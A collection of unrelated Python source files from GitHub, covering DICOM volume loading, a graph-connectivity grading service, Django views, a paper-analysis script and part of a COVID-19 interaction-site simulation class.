dss = [pydicom.dcmread(str(dicom_folder/dcm)) for dcm in os.listdir(dicom_folder) if dcm.endswith('.dcm')]
vol, mat = dicom_numpy.combine_slices(dss, rescale)
return vol, dss[0]
def get_largest_dir(dirs, minsize=100):
''' Returns the dir with the most files from `dirs`'''
m = max(dirs, key=lambda d: len(os.listdir(d)) if os.path.isdir(d) else 0)
if len(os.listdir(m)) >= minsize: return m
else: return None
def get_volume_dirs(path):
path = Path(path)
return list(
filter(lambda p: p is not None,
map( get_largest_dir, # extract subdir with most files in it (highest res volume)
map( lambda p: list(p.iterdir()), # get list of actual volume directorie
map( lambda p: next(p.iterdir())/'Unknown Study', # cd into subfolders CQ500-CT-XX/Unknown Study/
filter(lambda p: p.is_dir(), # Get all dirs, no files
path.iterdir()))))) # Iterate over path directory
)
def get_volume_gen(volume_dirs, rescale=None, tf_pts=None):
''' Make a generator that loads volumes from a list of volume directories, `volume_dirs`.
Returns: (volume:np.ndarray , index_to_pos_4x4:np.ndarray) '''
def vol_gen():
for vol_dir in volume_dirs:
with hidden_errors():
try:
vol, dcm = read_dicom_folder(vol_dir, rescale)
vox_scl = np.array([dicom.PixelSpacing[0], dicom.PixelSpacing[1], dicom.SliceThickness]).astype(np.float32)
vox_scl /= vox_scl.min()
vol_name = str(vol_dir.parent.parent.parent.name)
if tf_pts is None:
peaks = get_histogram_peaks(normalized_vol)
tf_pts = get_trapezoid_tf_points_from_peaks(peaks)
except dicom_numpy.DicomImportException:
print(f'Could not load {vol_dir}')
continue
yield vol, tf_pts, vox_scl, vol_name
return vol_gen()
__all__ = ['read_dicom_folder', 'get_largest_dir', 'get_volume_gen', 'get_volume_dirs']
| xeTaiz/dvao | volume_loader.py | volume_loader.py | py | 2,556 | python | en | code | 6 | github-code | 36 |
35382251444 | #!/usr/bin/env python3
from re import M
from sys import stderr, exit
from multilanguage import Env, Lang, TALcolors
from TALinputs import TALinput
import random
import graph_connectivity_lib as gcl
from time import monotonic
# METADATA OF THIS TAL_SERVICE:
problem="graph_connectivity"
service="eval_bot_deciding_connectivity"
args_list = [
("goal",str),
("check_also_yes_certificate",bool),
("check_also_no_certificate",bool),
("code_lang",str),
("lang",str)
]
ENV = Env(args_list)
TAc = TALcolors(ENV)
LANG= Lang(ENV, TAc, lambda fstring: eval(f"f'{fstring}'"))
# Random n
n = random.randint(2, 1000)
# Random m
max_m = (n * (n-1))//2
if max_m > 10000: # Setting maximum
max_m = 10000
m = random.randint(n-1, max_m)
stderr.write(f"n: {n}, m: {m}\n")
is_connected = True
seed = gcl.gen_instance_seed(connected=is_connected)
g = gcl.generate_graph(n, m, seed , TAc=TAc, LANG=LANG)
TAc.print(LANG.render_feedback("assigned-instance",f'Instance:\n n: {n}\nm: {m}\n seed: {seed}'), "yellow")
TAc.print(f'graph:\n{g.to_str()}', "white")
# Getting answer (y or n)
start = monotonic()
user_answer = input()
end = monotonic()
time = end - start
stderr.write(f"user_answer: {user_answer}\n")
stderr.write(f"is_connected: {is_connected}\n")
# Checking input validity
if (user_answer == "Y" or user_answer == "y"):
user_answer = "yes"
if (user_answer == "N" or user_answer == "n"):
user_answer = "no"
if (user_answer!= "yes" and user_answer!="no"):
TAc.print(LANG.render_feedback("not-input", 'Input not valid. You can say Y,N,yes,no'),"red")
exit(0)
# Wrong answers
if(user_answer == "yes" and is_connected == False):
TAc.print(LANG.render_feedback("wrong-not-connected", 'WRONG, the graph is not connected'),"red")
exit(0)
if(user_answer == "no" and is_connected == True):
TAc.print(LANG.render_feedback("wrong-connected", 'WRONG, the graph is connected'),"red")
exit(0)
stderr.write(f"cert - {is_connected}, {ENV['check_also_yes_certificate']}\n")
# CERTIFICATE
# yes cert
if (is_connected and ENV["check_also_yes_certificate"]):
TAc.print(LANG.render_feedback("waiting-sp-tree",f'#? waiting for your spanning tree as routing table.\n# Format: each line two numbers separated by space. Then follow m lines, one for each edge, each with two numbers in the interval [0,n).\n# These specify the tail node and the head node of the edge, in this order.\n# Any line beggining with the \'#\' character is ignored.\n# If you prefer, you can use the \'TA_send_txt_file.py\' util here to send us the lines of a file. Just plug in the util at the \'rtal connect\' command like you do with any other bot and let the util feed in the file for you rather than acting by copy and paste yourself.'), "yellow")
# Asking and getting sp.tree length
TAc.print(LANG.render_feedback("waiting-sp-tree-len",'# Tell me how many rows are in your spanning tree table'), "yellow")
start = monotonic()
sptree_len = TALinput(int, 1, TAc=TAc)
stderr.write(f"sp.tree len: {sptree_len}\n")
span = gcl.Graph(n)
has_outer_edges = True
not_in_graph = []
for i in range(sptree_len[0]):
head, tail = TALinput(int, 2, TAc=TAc)
head, tail = int(head),int(tail)
# Checking if the inserted nodes are in the range [0, n]
if tail >= n or head >= n or tail < 0 or head < 0:
stderr.write(f"{head},{tail}\n")
TAc.print(LANG.render_feedback("n-at-least-1", f'# ERROR: both ends of an edge must be nodes of the graph, i.e. integers in the range [0,{ENV["MAXN"]}.'), "red")
exit(0)
# check the existence of the edges (and nodes)
if(g.check_edge(head,tail)):
span.add_edge(head, tail)
else:
has_outer_edges = False
edge = (int(head),int(tail))
not_in_graph.append(edge)
end = monotonic()
time_certificate = end - start
stderr.write(f"span\n{span.to_str()}\n")
# check if is connect
is_certificate_correct, not_conn = span.is_connected(True)
is_certificate_correct = is_certificate_correct and has_outer_edges
# no cert
if (not is_connected and ENV["check_also_no_certificate"]):
# Bipartition?
pass
if(ENV["goal"]=="correct"):
if(ENV["check_also_yes_certificate"] or ENV["check_also_no_certificate"]):
if is_certificate_correct:
TAc.print(LANG.render_feedback("correct-certificate",'Good! Your certificate is correct'),"green")
else:
TAc.print(LANG.render_feedback("wrong-certificate",f'WRONG! Certificate is not correct'), "red")
else:
TAc.print(LANG.render_feedback("right",f'Right!'), "green")
if time > 10:
TAc.print(LANG.render_feedback("not-efficient",'Your algorithm as a whole is not very efficient, it takes more than a second\n'),"red")
else:
TAc.print(LANG.render_feedback("efficient",'Your algorithm overall seems to be efficient!\n'),"green")
TAc.print("#end", "white")
exit(0)
'''
## With a list of instances increasing dimensions
instances = []
if ENV['goal'] == "linear":
increase = 1.2
else: # Quadratic
increase = 1.7
min_n = 2
max_n = 100
for i in range(8):
n = random.randint(min_n, max_n)
# Random m
max_m = (n * (n-1))//2
if max_m > 10000: # Setting maximum
max_m = 10000
m = random.randint(n-1, max_m)
stderr.write(f"n: {n}, m: {m}\n")
min_n = max_n
max_n = int(max_n*increase)
stderr.write(f"min_n: {min_n}, max_n: {max_n}\n")
# Generating graph
seed = gcl.gen_instance_seed(connected=True)
instances.append(gcl.generate_graph(n, m, seed , TAc=TAc, LANG=LANG))
# Test
for graph in instances:
TAc.print(LANG.render_feedback("assigned-instance",f'Instance:\n n: {n}\nm: {m}\n seed: {seed}'), "yellow")
TAc.print(f'graph:\n{g.to_str()}', "white")
# Getting answer (y or n)
start = monotonic()
user_answer = input()
end = monotonic()
time = end - start
stderr.write(f"user_answer: {user_answer}\n")
# Come sopra
''' | romeorizzi/TALight | example_problems/tutorial/graph_connectivity/services/eval_bot_deciding_connectivity_driver.py | eval_bot_deciding_connectivity_driver.py | py | 6,055 | python | en | code | 11 | github-code | 36 |
74120599144 | from django.db.models import Q
from django.shortcuts import render
from apps.news.models import News, HeadlineNews, BottomInfo
# Views function for home page of site
def index(request):
# news part
latest_news = News.objects.order_by('-published_date')[:3]
headlines = HeadlineNews.objects.filter(is_publish=True)
headline1 = headlines.get(headline="headline1")
headline2 = headlines.get(headline="headline2")
headline3 = headlines.get(headline="headline3")
bottominfos = BottomInfo.objects.filter(is_publish=True)
info1 = bottominfos.get(bottom_info="info1")
info2 = bottominfos.get(bottom_info="info2")
info3 = bottominfos.get(bottom_info="info3")
context = {'latest_news': latest_news,
'headline1': headline1,
'headline2': headline2,
'headline3': headline3,
'info1': info1,
'info2': info2,
'info3': info3,
}
return render(request, 'home/index.html', context)
# View function for admin page that nested in home page
def about_us(request):
return render(request, 'home/about_us.html')
# View function for admin page that nested in home page
def administraion(request):
return render(request, 'home/include_admin.html') | libomun/crhs | apps/home/views.py | views.py | py | 1,287 | python | en | code | 0 | github-code | 36 |
6796248308 | import pandas
'''
features of papers used including:
1.main title
2.abstract contents
3.author
4.keywords
for both main title and abstract contents, dictionary and word counts need to be attained
expected result: a dict containing text, word count, and a dictionary
for authors, authors of each paper need to be ranked by their contribution(just weight them in order)
expected result: a list of authors
'''
DATA_PATH = ""
DATA_NAME = ""
class Author:
author_name = None
author_publication = list()
class Paper:
title = None
abstract = None
author_list = list()
word_dict = dict()
keywords = list()
vectorized_keywords = list()
label = None
index = None
def define(self, label, title, abstract,keywords, author_list, index, word_dict=None):
self.label = label
self.title = title
self.abstract = abstract
self.author_list = author_list
self.keywords = keywords
self.index = index
self.word_dict = word_dict
def computed_features(self, vectorized_keywords, keywords):
self.keywords = keywords
self.vectorized_keywords = vectorized_keywords
class Daedalus:
corpus_word_dictionary = dict()
corpus_author_list = dict()
corpus_paper_list = list()
def query_something(self, subject, target, sign):
author_profile = Author()
if sign:
if any(target):
for word in target:
if word == subject:
return 1
return 0
else:
return 0
elif not sign:
b = any(target.values())
if any(target.values()):
for element in target.values():
if type(element) == type(author_profile):
if element.author_name == subject:
return subject
return 0
else:
return 0
else:
return 0
def add_paper(self, paper):
p = Paper()
paper_title = paper.title.split()
word_dict = dict()
for word in paper_title:
t1 = self.query_something(word, word_dict.keys(), 1)
if t1 == 1:
word_dict[word] = word_dict[word] + 1
if t1 == 0:
word_dict[word] = 1
t2 = self.query_something(word, self.corpus_word_dictionary.keys(), 1)
if t2 == 1:
self.corpus_word_dictionary[word] = self.corpus_word_dictionary[word] + 1
if t2 == 0:
self.corpus_word_dictionary[word] = 1
paper_abstract = paper.abstract.split()
for word in paper_abstract:
t1 = self.query_something(word, word_dict.keys(), 1)
if t1 == 1:
word_dict[word] = word_dict[word] + 1
if t1 == 0:
word_dict[word] = 1
t2 = self.query_something(word, self.corpus_word_dictionary.keys(), 1)
if t2 == 1:
self.corpus_word_dictionary[word] = self.corpus_word_dictionary[word] + 1
if t2 == 0:
self.corpus_word_dictionary[word] = 1
p.define(paper.label, paper.title, paper.abstract, paper.author_list, paper.keywords, paper.index, word_dict)
self.corpus_paper_list.append(p)
# fetch the authors of each paper
# rank is defined as average author rank
def add_author(self, paper):
paper_authors = paper.author_list.split(',')
person = Author()
for author in paper_authors:
one = self.query_something(author, self.corpus_author_list, 0)
if one is 0:
person.author_name = author
person.author_publication.append(paper)
self.corpus_author_list[author] = person
else:
self.corpus_author_list[one].author_publication.append(paper)
def find_paper(self, index):
for paper in self.corpus_paper_list:
if paper.index == index:
return paper
return 0
# def whole_paper(self, paper):
| another1s/ontology_learning | program/analyse.py | analyse.py | py | 4,163 | python | en | code | 2 | github-code | 36 |
72167483303 | """
This file holds the interaction sites class used in simulation.py.
"""
import warnings
from random import random
from copy import deepcopy
from itertools import combinations
from math import comb
import numpy as np
class InteractionSites:
"""A class designed to host interactions between persons within specific locations.
There are currently 7 different locations that can host interactions between
person objects.
All attributes are passed through the sim_obj, which accesses the simulation
configuration file. Outlined below are the main object attributes that provide the
interaction functionality.
Attributes
----------
grade_A_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to represent resturants, gas stations, retail stores, etc. Any location where you
do not visit often, but attend a wide variety of them.
grade_B_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to represent a gym, grocery store, etc. Any location where
you visit semi-often, and are likly to visit the same one, but this may varry.
grade_C_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to represent offices or schools. Any location where they are
visited almost every workday, and you almost always visit the same one.
house_sites : :obj:`np.array` of :obj:`list` of :obj:`int`
Visited by every person each day, and hosts interactions between members
of the same household. Infection spread at home is not defined by explicit contacts,
but by a known spread factor.
lect_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to replicate university lecture hall interactions. They are only visited by students.
study_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to replicate study environments at university, on-campus (library, bookable rooms, ...).
They are only visited by students.
food_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to replicate cafeteria and restaurant interactions on-campus. Only visited by students.
res_sites : :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to replicate the student residences on campus. They are only visited by first year students.
stud_house_sites : :obj:`np.array` of :obj:`list` of :obj:`int`
Visited by every student each day, and hosts interactions between members
of the same household. Infection spread at home is not defined by explicit contacts,
but by a known spread factor.
"""
def __init__(self, sim_obj):
""" __init__ method docstring.
Parameters
----------
sim_obj : :obj:`cv19.simulation.simulation`
The encompassing simulation obejct hosting the simulation.
"""
# Set attributes from config file
self.load_attributes_from_sim_obj(sim_obj)
self.daily_interactions = {"HOUSE_GENERAL": np.zeros(self.nDays),
"HOUSE_STUDENT": np.zeros(self.nDays)}
# Generates a list of people that go to different grade X sites
# len(grade_X_sites) is how many sites there are; len(grade_X_sites[i]) is how many people go to that site
self.grade_A_sites = self.init_grade(grade_code="A")
self.grade_B_sites = self.init_grade(grade_code="B")
self.grade_C_sites = self.init_grade(grade_code="C")
self.house_sites = deepcopy(self.pop.household)
self.house_indices = deepcopy(self.pop.house_ppl_i)
# Students Stuff #
self.stud_house_sites = deepcopy(self.pop.stud_houses)
self.stud_house_indices = deepcopy(self.pop.house_stud_i)
self.lect_sites = self.init_uni(grade_code="LECT")
self.study_sites = self.init_uni(grade_code="STUDY")
self.food_sites = self.init_uni(grade_code="FOOD")
self.res_sites = self.init_res(grade_code="RES")
self.daily_new_infections = 0
def load_attributes_from_sim_obj(self, sim_obj):
"""Method to load in attributes from the provided simulation class object.
Sets all objects in the "interaction_sites_data" dictionary key as self
attributes of the InteractionSites class.
Parameters
----------
sim_obj : :obj:`cv19.simulation.simulation`
The encompassing simulation obejct hosting the simulation.
"""
attributes = sim_obj.parameters["interaction_sites_data"].keys()
for attr in attributes:
setattr(self, attr, sim_obj.parameters["interaction_sites_data"][attr])
# Get the disease parameters
d_attributes = sim_obj.disease_parameters["spread_data"].keys()
for attr in d_attributes:
setattr(self, attr, sim_obj.disease_parameters["spread_data"][attr])
# Get the virus type names
self.variant_codes = sim_obj.variant_codes
self.variant_code_map = {v_id: v_name for v_name, v_id in self.variant_codes.items()} # virus ids
# Set the actual objects now
self.pop = sim_obj.pop
self.policy = sim_obj.policy
self.nDays = sim_obj.parameters["simulation_data"]["nDays"]
def init_grade(self, grade_code):
"""Method designed to associate members of the population with interaction sites.
This method initializes all non-student interaction sites by creating a list
of person indices for each interaction site, for that type of interaction type.
Parameters
----------
grade_code : str
Code used to index the values to create this type of site from the config file.
Returns
-------
grade_sites : :obj:`np.array` of :obj:`np.array` of :obj:`int`
An array holding one array for each interaction site of this type. Each nested
array holds the index of people that are associated with that site (can visit it).
"""
loyalty_mean = self.grade_loyalty_means[grade_code]
loyalty_std = self.grade_loyalty_stds[grade_code]
students_interact = self.students_participate[grade_code]
# Calculate number of sites
num_sites = self.calculate_num_sites(grade_code=grade_code)
grade_sites = [[] for _ in range(num_sites)]
for person in self.pop.get_population():
if students_interact or not (self.students_on and person.job == 'Student'):
# if students are meant to go to this site
# Assign people to this specific site
num_diff_sites = abs(round(np.random.normal(loyalty_mean, loyalty_std)))
num_diff_sites = num_diff_sites if num_diff_sites <= num_sites else num_sites
# Get a list of len num_diff_sites for this person to be associated with now
person_sites = np.random.choice(num_sites, num_diff_sites, replace=False)
for site in person_sites:
# Assign this person to that site
grade_sites[site].append(person.get_index())
# Convert everything to numpy arrays
grade_sites = [np.asarray(site) for site in grade_sites]
# Initialize the number of interactions dictionary
self.daily_interactions[grade_code] = np.zeros(self.nDays)
return grade_sites
def init_uni(self, grade_code):
"""Method designed to associate members of the student population with interaction sites.
This method initializes all student interaction sites by creating a list
of person indices for each interaction site, for that type of interaction type.
Parameters
----------
grade_code : str
Code used to index the values to create this type of site from the config file.
Returns
-------
grade_sites : :obj:`np.array` of :obj:`np.array` of :obj:`int`
An array holding one array for each interaction site of this type. Each nested
array holds the index of people that are associated with that site (can visit it).
"""
loyalty_mean = self.grade_loyalty_means[grade_code]
loyalty_std = self.grade_loyalty_stds[grade_code]
# Calculate number of sites
num_sites = self.calculate_num_sites(grade_code=grade_code)
grade_sites = [[] for _ in range(num_sites)]
for student in self.pop.get_population():
if student.job == 'Student':
# Assign people to this specific site
num_diff_sites = abs(round(np.random.normal(loyalty_mean, loyalty_std)))
num_diff_sites = num_diff_sites if num_diff_sites <= num_sites else num_sites
# Get a list of len num_diff_sites for this person to be associated with now
student_sites = np.random.choice(num_sites, num_diff_sites, replace=False)
for site in student_sites:
# Assign this person to that site
grade_sites[site].append(student.get_index())
# Convert everything to numpy arrays
grade_sites = [np.asarray(site) for site in grade_sites]
# Initialize the number of interactions dictionary
self.daily_interactions[grade_code] = np.zeros(self.nDays)
return grade_sites
def init_res(self, grade_code):
"""Method designed to associate students with the residence interaction site.
This method initializes the residence interaction sites by creating a list
of person indices for each interaction site.
Parameters
----------
grade_code : str
Code used to index the values to create this type of site from the config file.
Returns
-------
grade_sites : :obj:`np.array` of :obj:`np.array` of :obj:`int`
An array holding one array for each interaction site of this type. Each nested
array holds the index of people that are associated with that site (can visit it)
"""
loyalty_mean = self.grade_loyalty_means[grade_code]
loyalty_std = self.grade_loyalty_stds[grade_code]
# Calculate number of sites
num_sites = self.calculate_num_sites(grade_code=grade_code)
grade_sites = [[] for _ in range(num_sites)]
for room in self.pop.get_residences():
for student_i in self.stud_house_indices[room]:
# Assign people to this specific site
num_diff_sites = abs(round(np.random.normal(loyalty_mean, loyalty_std)))
num_diff_sites = num_diff_sites if num_diff_sites <= num_sites else num_sites
# Get a list of len num_diff_sites for this person to be associated with now
student_sites = np.random.choice(num_sites, num_diff_sites, replace=False)
for site in student_sites:
# Assign this person to that site
grade_sites[site].append(student_i)
# Convert everything to numpy arrays
grade_sites = [np.asarray(site) for site in grade_sites]
# Initialize the number of interactions dictionary
self.daily_interactions[grade_code] = np.zeros(self.nDays)
return grade_sites
def daily_reset(self):
"""Method used to reset the interaction sites at the end of each day.
This function is currently used to clean up dead agents from interaction sites,
and to reset daily counts (such as the daily infection count).
Parameters
----------
None
Returns
-------
None
"""
self.remove_dead()
self.daily_new_infections = 0
def calculate_num_sites(self, grade_code):
"""Method used to calculate the number of sites for an interaction site grade.
Parameters
----------
grade_code : str
Code used to index the values to create this type of site from the config file.
Returns
-------
num_sites : int
The number of sites to be used for that interaction site grade.
"""
if grade_code in self.site_num and self.site_num[grade_code] == 0:
# Raise a warning
warnings.warn(f"Site type '{grade_code}' size set to 0. No interaction sites of this type created.")
return 0
else:
return self.site_num[grade_code] if grade_code in self.site_num else \
max(round(self.pop.get_population_size() / self.site_size[grade_code]), 1)
def remove_dead(self):
"""Method to remove dead agents from interaction site arrays.
Iterates through each type of site array, and will remove all agents that are
dead from each array.
Parameters
----------
None
Returns
-------
None
"""
# Create list of all dead agents
dead_agents = self.pop.get_dead()
# Site type A
for i, site_array in enumerate(self.grade_A_sites):
# Mask where True indicates alive and False indicates dead (note the invert argument)
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.grade_A_sites[i] = site_array[mask_alive]
# Site type B
for i, site_array in enumerate(self.grade_B_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.grade_B_sites[i] = site_array[mask_alive]
# Site type C
for i, site_array in enumerate(self.grade_C_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.grade_C_sites[i] = site_array[mask_alive]
# Site type lecture
for i, site_array in enumerate(self.lect_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.lect_sites[i] = site_array[mask_alive]
# Site type study
for i, site_array in enumerate(self.study_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.study_sites[i] = site_array[mask_alive]
# Site type food
for i, site_array in enumerate(self.food_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.food_sites[i] = site_array[mask_alive]
# Site type res
for i, site_array in enumerate(self.res_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.res_sites[i] = site_array[mask_alive]
def will_visit_site(self, site_array, will_go_prob):
"""Method to determine who will visit a site on a given day.
Generates a boolean list for each individual interaction site in site_array,
indicating what people from the list will visit that site on a given day. Accounts
for quarantined people by setting their will_go_prob value to
self.quarantine_isolation_factor.
Parameters
----------
site_array : :obj:`np.array` of :obj:`np.array` of :obj:`int`
An array holding lists (one for each interaction site) of the index of each person
associated with each of the individual sites.
will_go_prob : float
The probability that any given person in site_array will visit this type of site.
Returns
-------
will_visit_grade : :obj:`np.array` of :obj:`np.array` of :obj:`int`
An array holding an array for each site of this interaction site type.
Each individual list holds the indexes of people that will visit that site for this day.
"""
# Figure out who is going to go to this site type today.
person_ids = np.unique(np.concatenate(site_array))
# Create array of attendence probabilities.
prob_attendence = [self.quarantine_isolation_factor
if self.pop.get_person(person).is_quarantined() else will_go_prob
for person in person_ids]
# Select a subset of people who will actually choose to go to the site.
person_will_go_mask = np.random.binomial(1, p=prob_attendence).astype(bool)
person_ids = person_ids[person_will_go_mask]
# Create a Boolean array of people (rows) and sites (columns).
# Each entry corresponds to whether or not
# a given person can go to the given site.
person_site_array = np.zeros(shape=(person_ids.shape[0], len(site_array)), dtype=bool)
for s, site in enumerate(site_array):
mask = np.isin(person_ids, site)
person_site_array[mask, s] = True
# Choose a random number for each person,
# with an upper bound as the number of available sites for that person.
high = person_site_array.sum(axis=-1)
random_site_index = np.random.randint(low=0, high=high)
# argsort the array (descending) along sites and use random number above to select
# one of the available sites (first sites up to high[i] are available for person i).
site_indexes_argsorted = np.argsort(person_site_array, axis=-1)[..., ::-1]
person_site_index = site_indexes_argsorted[np.arange(site_indexes_argsorted.shape[0]),
random_site_index]
will_visit_grade = [person_ids[np.where(person_site_index == s)[0]]
for s in range(len(site_array))]
return will_visit_grade
def site_interaction(self, will_go_array, day, personal, grade_code):
"""Method that hosts interactions between people for an interaction site type.
This method manages interactions between people going to the same interaction
site this day. Currently, all people that visit the same site on a day have a
chance to interact with each other. Does not provide a return value, all
infections are managed within the function.
Parameters
----------
will_go_array : :obj:`np.array` of :obj:`np.array` of :obj:`int`
An array holding an array for each site of this interaction site type. Each individual list
holds the indexes of people that will visit that site for this day.
day : int
The day value that this function is being called on in the encompassing simulation class.
Used as input to the infect function after infections have been determined.
personal : bool
Used to indicate if the type of interaction at this site is personal, which relates to
contact tracing abilities.
grade_code : str
Code used to index the values to create this type of site from the config file.
"""
new_infections = np.zeros(self.pop.get_population_size(), dtype=bool)
new_infection_type = np.zeros(self.pop.get_population_size(), dtype=int)
total_interactions_count = 0
for ppl_going in will_go_array:
infected_persons = [index for index in ppl_going if self.pop.get_person(index).is_infected()]
recovered_persons = [index for index in ppl_going if self.pop.get_person(index).is_recovered()]
# Generate a list of how many interactions ppl have at the site
num_interactions = self.calc_interactions(site_day_pop=len(ppl_going))
total_interactions_count += np.sum(num_interactions) // 2
if len(infected_persons) == 0 or (len(infected_persons) + len(recovered_persons) == len(ppl_going)):
continue # No ppl to infect here or no one already infected
while np.sum(num_interactions > 0) > 1:
# grab the highest interactor
person_1 = np.argmax(num_interactions)
# find a random interactor for them to pair with (that is not them)
person_2 = np.random.randint(num_interactions.shape[0])
while person_2 == person_1 or num_interactions[person_2] <= 0:
person_2 = np.random.randint(num_interactions.shape[0])
# Get the actual people at these indexes
person_1_index = ppl_going[person_1]
person_2_index = ppl_going[person_2]
# Getting the Person objects and logging the contacts
p1_obj = self.pop.get_person(person_1_index)
p2_obj = self.pop.get_person(person_2_index)
p1_obj.log_contact(p2_obj, day=day, personal=personal)
p2_obj.log_contact(p1_obj, day=day, personal=personal)
# Check to make sure one is infected
person_1_infected = p1_obj.is_infected()
person_2_infected = p2_obj.is_infected()
if person_1_infected != person_2_infected:
# Have an interaction between those people
did_infect = self.interact(p1_obj, p2_obj)
if did_infect:
if person_1_infected:
new_infections[person_2_index] = True
new_infection_type[person_2_index] = self.pop.get_person(person_1_index).get_virus_type()
else:
new_infections[person_1_index] = True
new_infection_type[person_1_index] = self.pop.get_person(person_2_index).get_virus_type()
# Lower the interaction count for those people
num_interactions[person_1] -= 1
num_interactions[person_2] -= 1
# Update people who get infected only at the end. Assuming if I get CV19 at work, I probably won't spread at the store that night.
new_infection_indexes = np.where(new_infections)[0]
self.daily_new_infections += len(new_infection_indexes)
for new_infection in new_infection_indexes:
self.pop.infect(index=new_infection, virus_type=new_infection_type[new_infection], day=day)
# Update total daily interactions count
self.daily_interactions[grade_code][day] = total_interactions_count
def calc_interactions(self, site_day_pop):
"""Method to determine how many interactions a person will have.
Note
----
Currently the distribution for the number of interactions a given person will have is
a "triangular" distribution with only one side (a linear distribution). The distribution
output spans from 0 to site_day_pop/day_hours_scaler, where it is much more likely to have 0
interactions than the max. day_hours_scaler takes into account that people will not all be
at the interaction site at the same time, but will be dispersed throughout the 12 hour day.
As it stands, day_hours_scaler is not a config file parameter, as the hours in the day should not be
adjusted between simulations. If the need is felt for an adjustable scaling factor, a new (second)
variable should be introduced.
Parameters
----------
site_day_pop : `int`
The total number of people at that specific interaction site this day.
Returns
-------
number_of_interactions : :obj:`np.array` of :obj:`int`
The number of interactions all people will have within this interaction site.
"""
day_hours_scaler = 12
if site_day_pop == 0:
return np.array([])
else:
# Generate a linaer distribution from
number_of_interactions = np.round(np.random.triangular(left=0, mode=0, right=site_day_pop / day_hours_scaler,
size=site_day_pop)).astype(int)
return number_of_interactions
def interact(self, person_1, person_2):
"""Method that models the interaction between two people.
Parameters
----------
person_1 : :obj:`cv19.person.Person`
First person in the two-way interaction.
person_2 : :obj:`cv19.person.Person`
Second person in the two-way interaction.
Returns
-------
: :obj:`bool`
Whether or not the interaction caused the spread of the infection.
"""
p1_infected = person_1.is_infected()
p2_infected = person_2.is_infected()
virus_type = person_1.get_virus_type() if p1_infected else person_2.get_virus_type()
spread_prob = self.base_infection_spread_prob[self.variant_code_map[virus_type]]
if self.policy.get_mask_mandate():
p1_mask = person_1.wear_mask()
p2_mask = person_2.wear_mask()
P1_INWARD_EFF, P1_OUTWARD_EFF = person_1.mask_type_efficiency()
P2_INWARD_EFF, P2_OUTWARD_EFF = person_2.mask_type_efficiency()
if p1_infected:
if p1_mask:
spread_prob *= (1 - P1_OUTWARD_EFF)
if p2_mask:
spread_prob *= (1 - P2_INWARD_EFF)
elif p2_infected:
if p1_mask:
spread_prob *= (1 - P1_INWARD_EFF)
if p2_mask:
spread_prob *= (1 - P2_OUTWARD_EFF)
p1_vaccinated1 = person_1.is_vaccinated()
p2_vaccinated1 = person_2.is_vaccinated()
p1_vaccine_eff = person_1.vaccine_type_efficiency() if p1_vaccinated1 else 0
p2_vaccine_eff = person_2.vaccine_type_efficiency() if p2_vaccinated1 else 0
spread_prob *= ((1 - p1_vaccine_eff) * (1 - p2_vaccine_eff))
return random() < spread_prob
def house_interact(self, day):
"""Method to manage interactions between members of the same household.
Determines if any infection will spread among members of the same household. Different
from interaction sites in the fact that contacts are not calculated, but assumed to happen
between all house members. Does not have a return value, infections are managed internally.
Parameters
----------
day : int
The day value that this function is being called on in the encompassing simulation class.
Used as input to the infect function after infections have been determined.
"""
total_house_interactions = 0
for house_indices in self.house_indices:
# Get people in house
house_size = len(house_indices)
housemembers = [self.pop.get_population()[ind] for ind in house_indices]
virus_types = [person.get_virus_type() for person in housemembers]
total_house_interactions += comb(len(housemembers), 2)
# Do interactions between the housemates
for member1, member2 in combinations(housemembers, 2):
member1.log_contact(member2, day=day, personal=True)
member2.log_contact(member1, day=day, personal=True)
# Check if anyone in the house is infected
if any(housemembers[i].is_infected() for i in range(house_size)):
infected_housemembers = [i for i in range(house_size) if housemembers[i].is_infected()]
virus_types = [virus_types[i] for i in infected_housemembers]
healthy_housemembers = [i for i in range(house_size) if not housemembers[i].is_infected()]
for person in healthy_housemembers:
virus_id = np.random.choice(a=virus_types)
virus_name = self.variant_code_map[virus_id]
infection_chance = self.base_infection_spread_prob[virus_name] * self.house_infection_spread_factor
person_vaccinated = housemembers[person].is_vaccinated()
person_vaccine_eff = housemembers[person].vaccine_type_efficiency() if person_vaccinated else 0
infection_chance *= (1 - person_vaccine_eff)
caught_infection = random() < infection_chance
if caught_infection:
self.daily_new_infections += 1
if virus_id is None:
raise ValueError("House infection has incorrect virus type.")
self.pop.infect(index=housemembers[person].get_index(), day=day, virus_type=virus_id)
self.daily_interactions["HOUSE_GENERAL"][day] = total_house_interactions
def student_house_interact(self, day):
"""Method to manage interactions between members of the same student household.
Determines if any infection will spread among members of the same household. Different
from interaction sites in the fact that contacts are not calculated, but assumed to happen
between all house members. Does not have a return value, infections are managed internally.
Parameters
----------
day : int
The day value that this function is being called on in the encompassing simulation class.
Used as input to the infect function after infections have been determined.
"""
total_house_interactions = 0
for house_indices in self.stud_house_indices:
# Get people in house
house_size = len(house_indices)
housemembers = [self.pop.get_population()[ind] for ind in house_indices]
virus_types = [person.get_virus_type() for person in housemembers]
total_house_interactions += comb(len(housemembers), 2)
# Do interactions between the housemates
for member1, member2 in combinations(housemembers, 2):
member1.log_contact(member2, day=day, personal=True)
member2.log_contact(member1, day=day, personal=True)
# Check if anyone in the house is infected
if any(housemembers[i].is_infected() for i in range(house_size)):
infected_housemembers = [i for i in range(house_size) if housemembers[i].is_infected()]
virus_types = [virus_types[i] for i in infected_housemembers]
healthy_housemembers = [i for i in range(house_size) if not housemembers[i].is_infected()]
for person in healthy_housemembers:
virus_id = np.random.choice(a=virus_types)
virus_name = self.variant_code_map[virus_id]
infection_chance = self.base_infection_spread_prob[virus_name] * self.house_infection_spread_factor
person_vaccinated = housemembers[person].is_vaccinated()
